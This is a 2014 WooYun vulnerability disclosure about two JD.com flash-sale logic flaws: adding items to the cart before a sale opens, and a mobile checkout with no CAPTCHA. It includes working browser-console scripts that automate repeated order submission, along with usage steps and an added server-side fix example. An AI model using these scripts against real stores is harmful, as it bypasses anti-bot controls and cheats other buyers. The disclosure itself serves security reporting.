Vulnerability Summary (24 followers)
Defect ID: wooyun-2014-055091
Title: JD.com flash-sale purchase design flaw
Vendor: JD.com (京东商城)
Author: H.Rui
Submitted: 2014-03-31 11:17
Fix date: 2014-05-15 11:17
Published: 2014-05-15 11:17
Vulnerability type: design flaw / logic error
Severity: low
Self-assessed rank: 5
Status: confirmed by vendor
Source: http://www.wooyun.org. For questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2014-03-31: Details sent to the vendor, awaiting vendor handling
2014-03-31: Vendor confirmed; details disclosed to the vendor only
2014-04-10: Details disclosed to core white hats and relevant domain experts
2014-04-20: Details disclosed to regular white hats
2014-04-30: Details disclosed to intern white hats
2014-05-15: Details disclosed to the public
Brief description:
Two bugs in JD's flash-sale purchasing~
Detailed description:
The first bug: a product can be added to the cart before the flash sale starts.
For example, for the soon-to-launch "Huawei Honor 3X" (http://item.jd.com/1085146.html), adding it to the cart only takes entering http://cart.jd.com/cart/dynamic/gate.action?pid=185146&pcount=1&ptype=1 in the address bar. As for the product id, change it as you like.
The second bug: JD added a CAPTCHA on the PC web front end, but the mobile page has no verification. In a browser shortcut, add a space at the end of the Target field and append --user-agent="Android"; opening that shortcut then emulates an Android browsing environment.
Proof of concept:
So how is the second bug used? Just log in at http://m.jd.com/cart/cart.action, press F11 to open the developer-mode console, and enter the code below for unattended purchasing. Straight to the code; please change the sid to your own machine's sid.
var sid="ab6c8fb4b26e4e2558171f50d2e01dd0";
setInterval(function() {
    $.ajax({
        type: "POST",
        url: "http://m.jd.com/order/submit.action?sid="+sid,
        async: false,
        data: {
            "order.idShipmentType": 65,
            "order.idInvoiceHeaderType": 5,
            "order.idInvoiceContentsType": 1,
            "order.remark": "",
            "order.idInvoiceType": 1
        },
        dataType: "text",
        contentType: "application/x-www-form-urlencoded;charset=UTF-8",
        timeout: 5000,
        success: function(msg) {
            if (msg.indexOf("您多次提交过快") != -1) {
                console.log("您多次提交过快");
            } else {
                console.log("没货");
            }
        },
        complete: function(XMLHttpRequest, textStatus) {}
    });
}, 3000);
So how are these two bugs used together in practice to buy? The Coolpad Dazen F1 (酷派大神F1) is used as the example below.
Step 1: log in ahead of time and add the item to the cart:
http://cart.jd.com/cart/dynamic/gate.action?pid=1043963&pcount=1&ptype=1
Step 2: go to the checkout page and inject the following script in the console.
function submit_Order(){var actionUrl=OrderAppConfig.Domain+"/order/submitOrder.action";var checkcodeTxt=null;var checkCodeRid=null;var payPassword=null;var remark=null;var trackID=null;var mobileForPresale=null;var param="";if(!$("#submit_check_info_message").is(":hidden")){var anchor=$("#anchor_info").val();window.location.hash=anchor;return}if(!isEmpty($("#checkCodeDiv").html())){checkcodeTxt=$("#checkcodeTxt").val();if(isEmpty(checkcodeTxt)){alert("请先填写验证码!");return}}if(!isEmpty($("#checkCodeDiv").html())){checkCodeRid=$("#checkcodeRid").val()}if(!$("#paypasswordPanel").is(":hidden")){payPassword=$("#txt_paypassword").val();if(isEmpty(payPassword)){alert("请先填写支付密码");return}}if($("#isPresale").val()=="true"){if(check_presaleMobile()){mobileForPresale=$("#userMobileByPresale").html()}else{alert("请您先输入有效的预售手机号");return}if($("#presaleEarnest").attr("checked")!=true){alert("请您同意交付定金");return}}if(!isEmpty($("#orderRemarkItem").html())){remark=$("#remarkText").val();if(remark=="限45个字"){remark=""}}if(!isEmpty(checkcodeTxt)){param=param+"submitOrderParam.checkcodeTxt="+checkcodeTxt}if(!isEmpty(checkCodeRid)){param=param+"&submitOrderParam.checkCodeRid="+checkCodeRid}trackID=$("#TrackID").val();if(!isEmpty(trackID)){param=param+"&submitOrderParam.trackID="+trackID}if(!isEmpty(payPassword)){param=param+"&submitOrderParam.payPassword="+encodeURIComponent(payPassword)}if(!isEmpty(remark)){param=param+"&submitOrderParam.remark="+remark}if(!isEmpty($("#sopNotPutInvoice").val())){param=param+"&submitOrderParam.sopNotPutInvoice="+$("#sopNotPutInvoice").val()}else{param=param+"&submitOrderParam.sopNotPutInvoice="+false}if(!isEmpty(mobileForPresale)){param=param+"&submitOrderParam.presaleMobile="+mobileForPresale}if(isGiftBuy()){var hidePrice=false;if(!$("#giftBuyHidePriceDiv").is(":hidden")){hidePrice=$("#giftBuyHidePrice").is(":checked")}param=param+"&submitOrderParam.giftBuyHidePrice="+hidePrice}
var indexFlag=param.substring(0,1);if(indexFlag=="&"){param=param.substring(1,param.length)}var checkoutLoading=$('<span id="order-loading" class="checkout-state"><b></b>\u6B63\u5728\u63D0\u4EA4\u8BA2\u5355\uFF0C\u8BF7\u7A0D\u5019\uFF01</span>');var originSubmit=$("#order-submit").clone(true);$("#order-submit").replaceWith(checkoutLoading);param=addFlowTypeParam(param);jQuery.ajax({type:"POST",dataType:"json",url:actionUrl,data:param,cache:false,success:function(result){if(isUserNotLogin(result)){goToLogin();return}if(result.success){if(result.goJumpOrderCenter){successUrl="http://order.jd.com/center/list.action";window.setTimeout('window.location.href=successUrl+"?rd="+Math.random();',450);return}else{successUrl="http://s.trade.jd.com/success/success.action";window.location.href=successUrl+"?orderId="+result.orderId+"&rid="+Math.random();return}}else{if(result.message!=null){if(result.message.indexOf("商品无货")!=-1){var a=result.message.indexOf("编号为");var b=result.message.indexOf("的商品无货");var outSkus=result.message.substring(a+3,b);$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();if(!isEmpty(outSkus)){return}}else{if(result.message.indexOf("收货人信息中的省市县选择有误")!=-1){edit_Consignee()}else{if(result.message.indexOf("由于订单金额较大")!=-1){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();return}else{if(result.message.indexOf("验证码不正确")!=-1){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();return}else{if(result.message.indexOf("正在参与预售活动")!=-1){var a=result.message.indexOf("您购买的商品");var b=result.message.indexOf("正在参与预售活动");var outSkus=result.message.substring(a+6,b);if(!isEmpty(outSkus)){var tmpHtml="";var skuList=outSkus.split(",");for(var i=0;i<skuList.length;i++){
tmpHtml=tmpHtml+'<a target="_parent" href="http://item.jd.com/'+skuList[i]+'.html">'+skuList[i]+"</a>,"}tmpHtml=tmpHtml.substring(0,tmpHtml.length-1);result.message="您购买的商品"+tmpHtml+"正在参与预售活动,请进入商品详情页单独购买"}$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show()}else{$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();return}}}}}}else{$("#order-loading").replaceWith(originSubmit);$("#submit_message").html("亲爱的用户请不要频繁点击, 请稍后重试...");$("#submit_message").show();getNextCheckCode();return}}},error:function(error){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html("亲爱的用户请不要频繁点击, 请稍后重试...");$("#submit_message").show();getNextCheckCode()}})}$(function(){setTimeout(function(){$("#checkcodeTxt").keypress(function(e){if(e.keyCode==13){submit_Order()}})},1000);$("#submit_message").css("top","0")});
Step 3: if your browser is in the PC environment, wait and enter the CAPTCHA; the best interval is 3 seconds. If your browser is already in the mobile browsing environment, the purchase succeeds immediately!
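Both flaws above are server-side gaps: the cart gate accepted any sku before the sale opened, and the human-verification step was bound to one front end rather than to the order-submission action. The following is an added editorial example (not the reporter's code and not JD's fix) of a checkout policy that closes both, with the product id 1043963 from the report and the sale time, throttle window and CAPTCHA verifier as constructed assumptions:

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Callable, Dict, List, Optional, Tuple

@dataclass
class Product:
    sku: str
    sale_start: datetime              # instant the flash sale opens

@dataclass
class Session:
    sid: str
    cart: List[str] = field(default_factory=list)
    last_submit: Optional[datetime] = None

class CheckoutPolicy:
    MIN_SUBMIT_GAP = timedelta(seconds=10)   # assumed per-session throttle
    def __init__(self, catalog: Dict[str, Product], verify_captcha: Callable[[str], bool]):
        self.catalog = catalog
        self.verify_captcha = verify_captcha  # stand-in for the CAPTCHA service

    def add_to_cart(self, s: Session, sku: str, now: datetime) -> Tuple[bool, str]:
        # Flaw 1: the cart gate URL accepted any sku before the sale opened.
        # The sale-start check must run here, server-side, not only in the page UI.
        if now < self.catalog[sku].sale_start:
            return False, "sale has not started"
        s.cart.append(sku)
        return True, "added"

    def submit_order(self, s: Session, channel: str, captcha: str, now: datetime) -> Tuple[bool, str]:
        # Flaw 2: CAPTCHA was enforced only on the PC front end. `channel` (like
        # User-Agent) is client-controlled, so it never decides which checks run.
        if not self.verify_captcha(captcha):
            return False, f"captcha required ({channel})"
        # The report's loop re-posted every 3 s; throttle repeats per session.
        if s.last_submit is not None and now - s.last_submit < self.MIN_SUBMIT_GAP:
            return False, "too many submissions"
        s.last_submit = now
        return True, "order accepted"

def run_scenario() -> Dict[str, Tuple[bool, str]]:
    t0 = datetime(2014, 3, 31, 10, 0)                      # assumed sale start
    policy = CheckoutPolicy({"1043963": Product("1043963", t0)}, lambda tok: tok == "ok")
    s = Session("constructed-sid")
    r = {"early_add": policy.add_to_cart(s, "1043963", t0 - timedelta(hours=1))}
    r["add"] = policy.add_to_cart(s, "1043963", t0)
    r["mobile_no_captcha"] = policy.submit_order(s, "mobile", "", t0)
    r["mobile_captcha"] = policy.submit_order(s, "mobile", "ok", t0)
    r["repeat_3s"] = policy.submit_order(s, "mobile", "ok", t0 + timedelta(seconds=3))
    return r
```

run_scenario() replays the report's sequence: the pre-sale cart add and the CAPTCHA-less mobile submission are refused, and a second submission 3 seconds later is throttled.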
Suggested fix:
Copyright notice: when reposting, credit the source: H.Rui@WooYun
Vulnerability Response
Vendor response:
Severity: high
Vulnerability rank: 15
Confirmed: 2014-03-31 11:31
Vendor reply:
Thank you for your attention to JD.
Latest status:
None